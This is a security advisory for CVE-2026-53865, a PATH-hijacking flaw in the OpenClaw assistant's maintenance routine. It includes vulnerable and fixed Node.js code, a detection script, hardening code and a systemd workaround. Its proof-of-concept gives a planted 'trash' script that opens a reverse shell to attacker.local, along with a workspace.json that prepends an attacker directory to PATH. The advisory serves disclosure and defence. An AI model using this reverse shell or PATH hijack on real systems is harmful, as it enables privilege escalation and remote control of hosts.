Jun 19, 2026
OpenClaw vulnerabilities in dynamic environment configurations allow lower-privileged users to hijack system commands during automated maintenance cycles, leading to local privilege escalation.
A critical untrusted search path vulnerability (CWE-426) exists in OpenClaw, an open-source, multi-platform personal AI assistant. In versions prior to 2026.5.2 (and up to 2026.5.26 in specific deployment configurations), the application merges workspace-derived configuration parameters into the operating system environment object. When executing administrative maintenance routines, OpenClaw invokes external system commands, such as the 'trash' utility, without verifying the underlying executable path. This allows a low-privileged local user or workspace collaborator to hijack binary execution flows, resulting in arbitrary command execution within the privilege context of the OpenClaw service wrapper.
OpenClaw is designed as a local-first AI assistant requiring tight integration with host file systems and native utilities. To ensure optimal file storage, OpenClaw features automated maintenance procedures that run periodically or are invoked manually by administrators. These tasks process and clear temporary files, cached execution nodes, and user configuration backups. To prevent standard, irreversible system deletion, the cleanup routines invoke the 'trash' system utility to securely move unnecessary objects to the recycling area.
The core of the vulnerability lies in how OpenClaw configures workspace-derived execution environments. Workspace properties are managed using dedicated settings files, which can include customized environment variables intended to help user-defined tasks and integration wrappers locate local system resources. However, OpenClaw does not isolate administrative cleanup operations from these workspace configurations.
When a maintenance task is executed, the application dynamically generates a process environment containing the workspace-specific modifications. Because this environment is derived from user-controlled workspace properties, an attacker who is a local user or has access to change the workspace structure can append paths to the system execution path. This behavior exposes a critical attack surface, resulting in untrusted path resolution.
The root cause of CVE-2026-53865 is a CWE-426 (Untrusted Search Path) weakness in the maintenance module of OpenClaw. When spawning system-level child processes, Node.js applications use the `child_process` module's execution APIs, such as `spawn` or `exec`. These APIs accept an optional options object whose `env` property sets the child's environment. If `env` is not defined, Node.js defaults to the current environment, `process.env`.
In affected versions of OpenClaw, the process creation mechanism merges the global process.env with an array of key-value pairs parsed from the workspace's local configurations. This merge process prepends or appends custom directory entries to the PATH environment variable. When the maintenance routine schedules a run, it issues an execution request for the default cleanup utility, which relies on the operating system's resolution mechanism to find the command.
Because the workspace configuration is parsed directly into the child process's execution context, the host operating system performs binary resolution using the polluted PATH variable first. If the PATH contains an attacker-controlled directory at the front of the list, the system locates and executes the binary located inside that directory instead of the standard executable in system paths such as /usr/bin or /bin.
The logical flaw is visible in how the system task runner processes the local workspace properties before spawning child processes.

```javascript
// VULNERABLE CODE PATH
const cp = require('child_process');
const fs = require('fs');
const path = require('path');

function runMaintenanceJob(workspaceDir, filesToPurge) {
  // Extract workspace configuration settings
  const configPath = path.join(workspaceDir, 'workspace.json');
  const rawConfig = fs.readFileSync(configPath, 'utf8');
  const config = JSON.parse(rawConfig);

  // VULNERABLE: Direct merging of untrusted environment variables
  const mergedEnv = {
    ...process.env,
    ...config.customEnv
  };

  // VULNERABLE: Invoking a system command without utilizing an absolute path
  // If customEnv modifies PATH, Node.js resolves 'trash' using the modified environment
  const processTask = cp.spawn('trash', filesToPurge, {
    env: mergedEnv,
    shell: true
  });
}
```

The fix implementation resolves this by separating the environment context of local workspace commands from core administrative operations. It also enforces absolute path resolution for system utilities.

```javascript
// SECURED CODE PATH
const cp = require('child_process');
const path = require('path');

function runMaintenanceJobSecured(workspaceDir, filesToPurge) {
  // Hardcode or resolve the absolute path to the system utility securely
  const trustedUtilityPath = process.platform === 'win32'
    ? 'C:\\Windows\\System32\\recycle.exe'
    : '/usr/bin/trash-put';

  // Create a fully sanitized environment object
  const sanitizedEnv = { ...process.env };

  // Explicitly restrict PATH to trusted directories only
  sanitizedEnv.PATH = process.platform === 'win32'
    ? 'C:\\Windows\\System32;C:\\Windows'
    : '/usr/bin:/bin:/usr/sbin:/sbin';

  // Execute using the absolute path with shell evaluation disabled
  const processTask = cp.spawn(trustedUtilityPath, filesToPurge, {
    env: sanitizedEnv,
    shell: false
  });
}
```

Exploitation requires an attacker to have local write access to an active workspace directory or the ability to influence its environment settings. The configuration can be modified via an integrated JSON workspace profile or an external .env file depending on deployment parameters.
An attacker begins by creating a local directory within a writable space, such as /tmp/attack_vector. Inside this folder, the attacker places a compiled binary or script named trash. This payload contains the instructions to execute within the target service context.

```sh
# Example of an attacker-crafted script located in /tmp/attack_vector/trash
#!/bin/sh
/bin/bash -c "bash -i >& /dev/tcp/attacker.local/4444 0>&1"
```

Once the payload is ready and executable, the attacker modifies the local workspace.json config settings or relevant environmental directives inside the workspace folder:

```json
{
  "workspaceName": "Default Project",
  "customEnv": {
    "PATH": "/tmp/attack_vector:/usr/bin:/bin"
  }
}
```

When a standard maintenance cycle is triggered automatically or started manually, the OpenClaw service scans the workspace files, merges the environment variables, and executes the cleanup function. The operating system references /tmp/attack_vector first, resulting in the execution of the attacker's trash script rather than the system-wide tool.
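
A detection check for the configuration described above, as an added example that is not part of the original advisory or of OpenClaw's code: it audits a parsed workspace.json for `customEnv` PATH overrides and flags entries that are relative, outside a trusted set, missing, or group/world-writable. The function names and the `TRUSTED_DIRS` list are assumptions for a POSIX host.

```javascript
const fs = require('fs');
const path = require('path');

// Assumption: directories this deployment trusts for system utilities (POSIX).
const TRUSTED_DIRS = new Set(['/usr/bin', '/bin', '/usr/sbin', '/sbin']);

// Return the reasons a single PATH entry is risky; an empty list means none.
function auditPathEntry(entry) {
  if (entry === '' || !path.isAbsolute(entry)) {
    // Empty and relative entries resolve against the current working directory.
    return ['relative-or-empty'];
  }
  const reasons = [];
  const dir = path.normalize(entry).replace(/\/+$/, '') || '/';
  if (!TRUSTED_DIRS.has(dir)) reasons.push('outside-trusted-dirs');
  try {
    // Group- or world-writable directories let other local users plant files.
    if (fs.statSync(dir).mode & 0o022) reasons.push('group-or-world-writable');
  } catch (err) {
    reasons.push('missing'); // may be created later by whoever owns the parent
  }
  return reasons;
}

// Audit the customEnv block of a parsed workspace.json; returns findings.
function auditWorkspaceConfig(config) {
  const findings = [];
  const customEnv = (config && config.customEnv) || {};
  for (const [key, value] of Object.entries(customEnv)) {
    if (key.toUpperCase() !== 'PATH') continue; // "Path" on Windows is PATH too
    String(value).split(path.delimiter).forEach((entry, index) => {
      const reasons = auditPathEntry(entry);
      if (reasons.length > 0) findings.push({ key, index, entry, reasons });
    });
  }
  return findings;
}

// Constructed sample input: the workspace profile from the section above.
const sampleConfig = {
  workspaceName: 'Default Project',
  customEnv: { PATH: '/tmp/attack_vector:/usr/bin:/bin' },
};
console.log(JSON.stringify(auditWorkspaceConfig(sampleConfig), null, 2));
```

Any finding at index 0 deserves the most attention, since the first matching directory wins command resolution.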
Successful exploitation of CVE-2026-53865 leads to local privilege escalation. Because OpenClaw is designed to manage various local storage drives and external service instances, its administrative worker services are often configured with elevated system-level permissions. If a service runs under a specialized administrative user or as root, any commands executed via the untrusted search path vulnerability will run with those same high-level system permissions.
This vulnerability breaks local multi-tenant boundaries. In environments where multiple developers or automated systems share a single OpenClaw Gateway deployment, low-privileged workspace contributors can escalate their privileges to compromise the underlying system.
The impact also extends to local networks, because a compromised assistant can expose credentials, session cookies, database schemas, and AI models stored in memory.
Administrators must deploy updated binaries to resolve the path injection issue. OpenClaw release 2026.5.2 restricts environment merging and forces absolute paths for system execution contexts. If utilizing specific OS distributions, administrators should update deployments to version 2026.5.26 to address all beta-channel configurations.
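
One way to restrict environment merging and force absolute paths, as an added example that is not OpenClaw's actual patch: workspace `customEnv` is filtered before user tasks see it, and maintenance jobs get an environment built from an allowlist rather than a copy of `process.env`. All function names, the `LOADER_VARS` denylist, the allowlisted keys and the POSIX PATH value are assumptions.

```javascript
const cp = require('child_process');
const path = require('path');

// Variables that change how binaries, libraries or interpreters are located.
// Assumption: an illustrative denylist, not an exhaustive one.
const LOADER_VARS = new Set([
  'PATH', 'PATHEXT', 'LD_PRELOAD', 'LD_LIBRARY_PATH', 'LD_AUDIT',
  'DYLD_INSERT_LIBRARIES', 'DYLD_LIBRARY_PATH', 'NODE_OPTIONS', 'NODE_PATH',
]);

// Split workspace customEnv into values user tasks may receive and rejected keys.
function filterWorkspaceEnv(customEnv) {
  const allowed = {};
  const rejected = [];
  for (const [key, value] of Object.entries(customEnv || {})) {
    // Compare upper-cased: Windows treats "Path" and "PATH" as one variable.
    if (LOADER_VARS.has(key.toUpperCase()) || typeof value !== 'string') {
      rejected.push(key);
    } else {
      allowed[key] = value;
    }
  }
  return { allowed, rejected };
}

// Environment for maintenance jobs: an allowlist of the service's own variables
// plus a fixed PATH. Workspace-derived values are never consulted here.
function buildMaintenanceEnv(baseEnv, trustedPath) {
  const env = { PATH: trustedPath };
  for (const key of ['HOME', 'LANG', 'TMPDIR', 'XDG_DATA_HOME']) {
    if (typeof baseEnv[key] === 'string') env[key] = baseEnv[key];
  }
  return env;
}

// Hypothetical wrapper: absolute utility path, no shell, isolated environment.
function spawnMaintenance(utilityPath, args, baseEnv = process.env) {
  if (!path.isAbsolute(utilityPath)) {
    throw new Error(`refusing non-absolute utility path: ${utilityPath}`);
  }
  const env = buildMaintenanceEnv(baseEnv, '/usr/bin:/bin:/usr/sbin:/sbin');
  return cp.spawn(utilityPath, args, { env, shell: false, stdio: 'ignore' });
}
```

Logging the `rejected` keys gives operators a signal that a workspace tried to override a loader variable.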
If manual patching is not immediately feasible, deploy the following workarounds to reduce risk:

```ini
# Restrict daemon executions inside systemd units by locking down path properties:
[Service]
Environment="PATH=/usr/bin:/bin:/usr/sbin:/sbin"
```

`CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| openclaw OpenClaw | < 2026.5.2 | 2026.5.2 |
| openclaw OpenClaw | < 2026.5.26 | 2026.5.26 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-426 |
| Attack Vector | Local |
| CVSS v4.0 | 7.2 |
| EPSS Score | 0.00118 (Percentile: 2.01%) |
| Impact | Arbitrary Command Execution / Privilege Escalation |
| Exploit Status | Proof of Concept |
| KEV Status | Not Listed |
The application searches for critical executables or library files within paths that can be manipulated by untrusted users.